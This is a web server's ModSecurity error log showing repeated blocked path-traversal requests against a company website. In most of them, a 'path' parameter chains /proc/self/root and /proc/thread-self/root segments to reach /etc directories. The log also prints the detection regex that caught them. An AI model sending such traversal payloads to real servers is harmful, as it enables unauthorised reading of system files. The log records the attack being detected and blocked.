[Mon Mar 16 10:21:54.867270 2026] [:error] [pid 21533:tid 140411590858496] [client 74.7.243.203:35918] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgD8njZBu2q05ozVU9H2AAAAVI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:21:57.652406 2026] [:error] [pid 10709:tid 140411548894976] [client 74.7.241.46:35016] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgD9RXjF1vJNtV6CWrr0wAAAdc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:21:58.158050 2026] [:error] [pid 21946:tid 140411632822016] [client 74.7.243.203:35928] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgD9nbQATo66fKoS7w_rAAAAM0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:21:59.463898 2026] [:error] [pid 11972:tid 140411607643904] [client 74.7.243.203:35934] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgD95qj1wV0Si-OkefbeQAAABA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:22:39.722726 2026] [:error] [pid 21533:tid 140411624429312] [client 74.7.243.203:38688] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgEH3jZBu2q05ozVU9IAAAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:22:42.119793 2026] [:error] [pid 10831:tid 140411574073088] [client 74.7.243.203:37888] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgEIo6lpbStxTqkSktgawAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:22:45.617921 2026] [:error] [pid 10651:tid 140411683178240] [client 74.7.241.46:54662] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgEJbysWC90G-1nBrA32QAAAYc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:22:47.406218 2026] [:error] [pid 10831:tid 140411649607424] [client 74.7.243.203:37904] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgEJo6lpbStxTqkSktgdAAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:22:52.911040 2026] [:error] [pid 11972:tid 140411649607424] [client 74.7.241.46:37322] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgEK5qj1wV0Si-OkefbjgAAAAs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:22:57.323028 2026] [:error] [pid 21946:tid 140411632822016] [client 74.7.241.46:34586] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgEMXbQATo66fKoS7w_uAAAAM0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:22:58.308421 2026] [:error] [pid 10709:tid 140411649607424] [client 74.7.243.203:37914] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgEMhXjF1vJNtV6CWrsEAAAAcs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:23:01.614352 2026] [:error] [pid 10709:tid 140411565680384] [client 74.7.243.203:37052] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgENRXjF1vJNtV6CWrsFgAAAdU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:23:05.405976 2026] [:error] [pid 21805:tid 140411540502272] [client 74.7.243.203:46172] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgEObABkC4fWIHEf8HdtQAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:23:22.930755 2026] [:error] [pid 21805:tid 140411716749056] [client 74.7.244.31:44454] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgESrABkC4fWIHEf8HdxQAAAEM"]
[Mon Mar 16 10:23:35.504561 2026] [:error] [pid 21805:tid 140411590858496] [client 74.7.243.203:46176] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgEV7ABkC4fWIHEf8Hd0QAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:23:38.807286 2026] [:error] [pid 21946:tid 140411582465792] [client 74.7.243.203:40930] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgEWnbQATo66fKoS7w_6AAAANM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:23:40.091084 2026] [:error] [pid 10831:tid 140411708356352] [client 74.7.243.203:40944] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgEXI6lpbStxTqkSktgegAAAkQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:24:01.770123 2026] [:error] [pid 32654:tid 140411733534464] [client 74.7.243.203:37840] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgEcQlT9VtDQc7bgUye9QAAAQE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:24:04.148998 2026] [:error] [pid 10651:tid 140411641214720] [client 74.7.243.203:49762] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgEdLysWC90G-1nBrA37AAAAYw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:24:05.481218 2026] [:error] [pid 21533:tid 140411733534464] [client 74.7.243.203:49766] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgEdXjZBu2q05ozVU9ICAAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:24:08.001993 2026] [:error] [pid 21806:tid 140411565680384] [client 74.7.243.203:49778] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgEeNSswJuvopo3lOhSsQAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:24:11.399379 2026] [:error] [pid 21533:tid 140411658000128] [client 74.7.243.203:49780] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgEe3jZBu2q05ozVU9ICwAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
